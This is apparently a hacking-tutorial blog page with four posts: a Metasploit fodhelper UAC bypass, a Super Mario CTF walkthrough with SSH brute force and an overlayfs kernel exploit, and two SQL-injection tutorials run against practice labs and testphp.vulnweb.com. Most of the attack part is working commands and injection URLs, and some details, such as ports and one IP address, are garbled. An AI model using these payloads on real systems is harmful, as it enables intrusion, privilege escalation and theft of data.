Showing posts with label Kali Linux. Show all posts
Showing posts with label Kali Linux. Show all posts

Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key)

Hello friends! Today we are going to share new article related to how to bypass window 10 UAC once you have hacked the victim’s system. In metasploit a new module has been added to achieve admin access in window 10s.
Attacker: kali Linux

Target: window 10


This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

Use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) >set session 1
msf exploit(bypassuac_fodhelper) >exploit

Hence you can see another meterpreter session 2 opened which means we successfully exploited the target once again now let’s check user privilege.
Meterpreter > get system

Awesome!!!! We got admin privilege successfully.

Hack the Super Mario (CTF Challenge)

Hello friends!! Might you people have played THE SUPER MARIO game once in your childhood and no wonder if a thought have been strike in your mind to hack the game. So whatever you had thought today we are going to make it true and for that you guys need to download the new VM machine for super Mario from here.

The credit for developing this VM machine is goes to Mr_h4sh who has hide 2 flag inside this lab as a challenge for hackers. The level of the challenge is Intermediate.
Let’s breach!!!

As you know we always start with enumeration, therefore open the terminal in your kali Linux and go for aggressive scan with nmap.

Nmap –p- -A 192.168.0.5


Since port 22 and port 8180 for service SSH and HTTP respectively therefore I choose port 8081 for enumeration but from screenshot you can see I didn’t get any remarkable result.
Dirb http://192.168.0.5:8180


Then I move for directory brute force attack using following command
Dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt
In the given below screenshot you can read it has shown a file name vhosts, let’s explore it through browser.


Now explore vhost in URL as  http://192.168.0.5:8180/vhosts here vhosts stand for virtual host it is method for hosting multiple domain on a single server. From inside Vhosts I came know the Server Name is mario.supermariohost.local  


Let’s add mario.supermariohost.local into /etc as new localhost
Cd etc
Vim hosts


Now type “192.168.0.5 mario.supermariohost.local” inside the vim editor to add it in the /etc/host and after then type wq to save it.


Now Type Cat hosts to check added host name Hence you from screenshot you can see it has been had added inside it successfully.

Then I visit mario.supermariohost.local on browser and finally got Mario as browser game but it is not working.


Since we know port 22 and 8081 was open and we didn’t get much information from enumeration of port 8081. Now we will move towards port 22 for SSH enumeration therefore I had prepared a dictionary in order to retrieve credential to login inside SSH server. 
Dictionary contains username which was the famous character of MARIO, you can check these name from Google also.
Inside text editor type following name: Mario; luigi; peach; toad; yoshi and save file as user on desktop.


Use john the ripper to generate dictionary of password using following command here –rules will enable the wordlist and --stdout will define a fix length of password to be generate on the desktop as pass.
John –wordlist : user –rules –stdout > pass


Finally we have username dictionary as user and password dictionary generated by john as pass, now we have to match perfect combination of user and pass in order to retrieve credential for SSH login. I had chosen hydra for password cracking, you can choose any other password cracking tool also.
Hydra –L user –P pass 192.168.0.5 ssh
From the given screenshot you read the matched combination of username: luigi and password: luigi1 for SSH server.


Now type following for SSH login
Password luigi1
Yeeppiii!!!!  Finally we have login inside SSH server.


Uname –a
Here we come to know that the version for linux  supermariohost 3.13.0; let’s checkout its exploit on Google.


Yes, there is an exploit for 3.13.0 overlayfs local root in ubuntu , download it from here inside your kali Linux.


Form screenshot you can see I have downloaded the exploit as Mario.c for privilege escalation. 


Now type following command for downloading Mario.c inside target system.
The file is successfully downloaded inside it now type another command to compile Mario.c
Gcc Mario.c –o mario


./Mario
Id
Cd/root
Ls
Awesome!!! We have got root privilege and from screenshot you can see inside its directory I have got zip file as flag.zip


Now type following command to download flag.zip on the desktop of your kali Linux
Scp /root/flag.zip root@192.168.0.6:/root/Desktop


Fcrackzip flag.zip –D –P /user/share/wordlist/rockyou.txt -u
As shown in given screenshot PASSWORD FOUND!!! : pw ==ilovepeach; now you can unzip your file using this password.
Unzip flag.zip
It will ask for password, give above password to unzip it and again if you notice the given image it contains flag.txt
Cat flag.txt
1st FLAG: Well done: D If you reached this it means you got root, congratulations.


Now follow the given below step in order to complete another challenge.
Iptables –L
Here from screenshot you can see a new network has been added on remote system.


Arp –n
Now the target system has been forwarded on a new IP 192.168.122.112


Ls -la
Found a directory .bak


Cd /.bak
Ls
Cd users
Cd luigi
Ls
There are two files inside it let’s read them one by one
Cat message
Hi Luigi,
Since you've been messing around with my host, at this point I want to return the favour.
This is a "war", you "naughty" boy!


Cat id_rsa.pub
The highlighted word in the given text may appear like a username for login into SSH server.


Let ensure by login into ssh -i id_rsa warluigi@192.168.1.122.112


Great!! All assumption had given positive result
Again check for kernel version
Uname -a
Woooww!! It is same version now we can use our Mario.c exploit for root privilege. Hence repeat the above step as shown in images.


The file is successfully downloaded inside it now type another command to compile Mario.c
Gcc Mario.c –o Mario
./Mario


Id
Cd /root
Ls –la
Here I found two important files 1st hint.txt 2nd flag2.zip before going for unzip flag.zip we must look towards hint.txt file.
Cat .hint.txt
Peach Loves Me” it might be the password key for decrypting the flag2.zip file 
Now let download fla2g.zip on the desktop of kali Linux by using following again
Scp /root/flag2.zip root@192.168.0.6:/root/Desktop


Unzip flag2.zip
Now when it will ask for password key type “Peach Loves Me
It contains flag2.txt inside type cat flag2.txt to open this file.
2nd FLAG: Congratulations on your second flag!
  
Wonderful!!! We have caught both flags

How to Bypass Filter in SQL Injection Manually

In previous article you have learned the basic concepts of SQL injection but in some scenarios you will find that your basic knowledge and tricks will fail. The reason behind that is the protection that developer had applied to prevent SQL injection, sometimes developer use filters to strip out few characters and OPERATORS from the user input before adding it to the query for SQL statement to prevent SQL Injection. Today’s article will help you to face such situations and will tell you how to bypass such filters. Here again we’ll be using DHAKKAN SQLI labs for practice.

Let’s start!!

LESSION 25
In Lab 25 OR and AND function are Blocked here we will try to bypass sql filter using their substitute.

function blacklist($id)
$id= preg_replace('/or/i',"", $id);                              //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id);                         //Strip out AND (non case sensitive)

Since alphabetic word OR, AND are blacklisted, hence if we use AND 1=1 and OR 1=1 there would be no output therefore I had use %26%26 inside the query.
 Following are replacement for AND and OR
AND :   &&   %26%26 
OR  :  || 

Open the browser and type following SQL query  in URL
http://localhost:81/sqli/Less-25/?id=1' %26%26 1=1 --+

From screenshot you can see we have successfully fixed the query for AND (&&) into URL encode as %26%26. Even when AND operator was filtered out.


Once the concept is clear to bypass AND filter later we need to alter the               SQL statement for retrieving database information.
http://localhost:81//sqli/Less-25/?id=-1' union select 1,2,3 %26%26 1=1 --+


Type following query to retrieve database name using union injection

http://localhost:81/sqli/Less-25/?id=-1' union select 1,database(),3 %26%26 1=1 --+

hence you can see we have successfully get securtiy as database name as result.


Next query will provide entire table names saved inside the database.
http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %26%26 1=1 --+
From screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users


Now we’ll try to find out column names of users table using following query.
http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %26%26 1=1 --+
Hence you can see it contains 4 columns inside it.
C1: id
C2: username
C3: password


At last execute following query to read all username inside the table users from inside its column.
http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(username),3 from users --+
From screenshot you can read the fetched data.

Hence in lesson 25 we have learn how to bypass AND, OR filter for retrieving information inside the database.



LESSION 26
You will find lab 26 more challenging because here space,Comments,OR and AND are Blocked so now we will try to bypass sql filter using their substitute.

Following are function blacklist($id)
preg_replace('/or/i',"", $id);                                       //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id);                          //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id);                       //strip out /*
$id= preg_replace('/[--]/',"", $id);                            //Strip out --
$id= preg_replace('/[#]/',"", $id);                             //Strip out #
$id= preg_replace('/[\s]/',"", $id);                            //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id);    //Strip out slashes

This lab has more filters as compared to lab 25  because here space,Comments are also Blocked. Now execute following query In URL .


From screenshot you can see we have successfully fixed the query for SPACE into URL encode as %a0
Blanks = ('%09', '%0A', '%0C', '%0D', '%0B' '%a0')


Once the concept is clear to bypass AND, OR and SPACE filter later we need to alter the                SQL statement for retrieving database information.
http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,2,3%a0%26%26'1=1


Type following query to retrieve database name using union injection.

Hence you can see we have successfully get securtiy as database name as result


Next query will provide entire table names saved inside the database.
From screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users


Now we’ll try to find out column names of users table using following query.

Hence you can see columns inside it.
C1: id
C2: username
C3: password


At last execute following query to read all username inside the table users from inside its column.
From screenshot you can read the fetched data.

Hence in lesson 26 we have learned how to bypass AND, OR, SPACE AND COMMENT filter for retrieving information from the database.


LESSON 27
You will find this lab even more challenging because here UNION/union, SELECT/select, SPACE and Comments are Blocked so now we will try to bypass sql filter using their substitute.

Following are function blacklist($id)
$id= preg_replace('/[\/\*]/',"", $id);                       //strip out /*
$id= preg_replace('/[--]/',"", $id);                            //Strip out --.
$id= preg_replace('/[#]/',"", $id);                                             //Strip out #.
$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
$id= preg_replace('/select/m',"", $id);       //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.
$id= preg_replace('/union/s',"", $id);         //Strip out union
$id= preg_replace('/select/s',"", $id);         //Strip out select
$id= preg_replace('/UNION/s',"", $id);      //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);       //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);         //Strip out Union
$id= preg_replace('/Select/s',"", $id);         //Strip out select

This lab has more filters in addtion to lab 26  because here union, select, space andComments are also Blocked. Now execute following query In URL .
http://localhost:81/sqli/Less-27/?id=1' AND'1=1


Once the concept is clear to bypass UNION/union, SELECT/select and SPACE filter later we need to alter the SQL statement for retrieving database information.
 In screenshot you can see I have use union as UnIon and select as SeLect in query to bypass the filter.


Now Type following query to retrieve database name using union injection.
Hence you can see we have successfully get securtiy as database name as result


Next query will provide entire table names saved inside the database.
From screenshot you can read the following table names:
T1: emails
T2: referers
T3: uagents
T4: users


Now we’ll try to find out column names of users table using following query.

Hence you can see columns inside it.
C1: id
C2: username
C3: password


At last execute following query to read all username inside the table users from inside its column.
From screenshot you can read the fetched data.


Hence in lesson 27 we have learned how to bypass UNION/union, SELECT/select, SPACE and COMMENT filter for retrieving information inside the database.

Manual SQL Injection Exploitation Step by Step

This article is based on our previous article where you have learned different techniques to perform SQL injection manually using dhakkan. Today we are again performing SQL injection manually on a live website “vulnweb.com” in order to reduce your stress of installing setup of dhakkan.

We are going to apply same concept and techniques as performed in Dhakkan on different the platform
 Let’s begin!

Open given below targeted URL in the browser

http://testphp.vulnweb.com/artist.php?artist=1 So here we are going test SQL injection for “id=1



Now use error base technique by adding an apostrophe () symbol at the end of input which will try to break the query.

http://testphp.vulnweb.com/artist.php?artist=1’


In the given screenshot you can see we have got error message which means the running site is infected by SQL injection.


Now using ORDER BY keyword to sort the records in ascending or descending order for id=1


Similarly repeating for order 2, 3 and so on one by one


From screenshot you can see we have got error at order by 4 which means it consist only three records.


Let’s penetrate more inside using union base injection to select statement from different table.

 From screenshot you can see it is show result for only one table not for others.


Now try to pass wrong input into database through URL by replacing artist=1 from artist=-1 as given below:


Hence you can see now it is showing the result for remaining two tables also.


Use next query to fetch the name of database
From screen shot you can read the database name acuart


Next query will extract current username as well as version of database system
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,version(),cuurent_user()
Here we have retrieve 5.1.73 0ubuntu0 10.04.1 as version and acuart@localhost as current user


Through next query we will try to fetch table name inside the database
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1
from screenshot you can name of first table is carts.


Similarly repeat the same query for another table with slight change
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1

We got table 2: categ


http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1

We got table 3: featured


Similarly repeat same query for table 4, 5, 6, and 7 with making slight changes in LIMIT.
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 7,1

We got table 7: users


http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 8,1


Since we didn’t get anything when limit is set 8, 1 hence their might be 7 tables only inside the database.


concat function is use for concatenation of two or more string into single string.

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

From screen you can see through concat function we have successfully retrieve all table name inside the

database.
Table1: artist
Table2: Carts
Table3: Featured
Table4: Guestbook
Table5: Pictures
Table6: Product
Table7: users


May be we can get some important data from users table, so let’s penetrate more inside.  Again Use concat function for table users for retrieving its entire column names.

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(column_name),3 from users
Awesome!!  We successfully retrieve all eight column names from inside the table users.
Then I have choose only four column i.e. uname, pass,email and cc for further enumeration.


Use concat function for selecting uname from table users by executing following query through URL
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(uname),3 from users

From screenshot you can read uname: test


Use concat function for selecting pass from table users by executing following query through URL
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(pass),3 from users

From screenshot you can read pass: test


Use concat function for selecting cc (credit card) from table users by executing following query through URL
http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(cc),3 from users
From screenshot you can read cc: 1234-5678-2300-9000


Use concat function for selecting email from table users by executing following query through URL

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(email),3 from users
From screenshot you can read email: jitendra@panalinks.com

 Enjoy hacking!!